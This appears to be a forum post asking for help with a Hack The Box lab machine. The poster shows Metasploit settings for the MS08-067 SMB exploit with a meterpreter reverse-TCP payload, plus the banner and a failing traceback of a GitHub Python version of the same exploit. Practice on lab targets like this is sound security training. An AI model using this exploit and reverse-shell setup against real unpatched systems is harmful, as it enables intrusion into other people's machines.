Here are the options I am using in metasploit for the ms08_067 exploit:
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
RHOSTS 10.129.38.127 yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:
’
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
EXITFUNC thread yes Exit technique (Accepted: ‘’, seh, thread, process, none)
LHOST REDACTED yes The listen address (an interface may be specified)
LPORT 8923 yes The listen port
Exploit target:
Id Name
6 Windows XP SP3 English (AlwaysOn NX)
I have tried the python exploit found on github with the same results as shown below:
kali@kali:~/hackthebox/Legacy/ms08_067$ python ms08_067_2018.py 10.129.38.127 7 445
#######################################################################
MS08-067 Exploit
This is a modified verion of Debasis Mohanty’s code (Microsoft Windows Server 2000/2003 - Code Execution (MS08-067) - Windows remote Exploit).
The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
Mod in 2018 by Andy Acer:
- Added support for selecting a target port at the command line.
It seemed that only 445 was previously supported.
- Changed library calls to correctly establish a NetBIOS session for SMB transport
- Changed shellcode handling to allow for variable length shellcode. Just cut and paste
into this source file.
#######################################################################
Windows XP SP3 English (AlwaysOn NX)
[-]Initiating connection
Exception in thread Thread-1:
Traceback (most recent call last):
File “/usr/lib/python2.7/threading.py”, line 801, in __bootstrap_inner
self.run()
File “ms08_067_2018.py”, line 206, in run
self.__DCEPacket()
File “ms08_067_2018.py”, line 181, in __DCEPacket
self.__trans.connect()
File “/usr/local/lib/python2.7/dist-packages/impacket/dcerpc/v5/transport.py”, line 394, in connect
self.__handle = self.__smb_connection.openFile(self.__tid, self.__filename)
File “/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py”, line 516, in openFile
raise SessionError(e.get_error_code(), e.get_error_packet())
SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
I have downgraded metasploit to version 5 with the same results.
I have tried numerous payloads and targets.
I have reset the box several times.
I have checked my VMware Kali box configuration and created a new Kali box.
Any help would be greatly appreciated!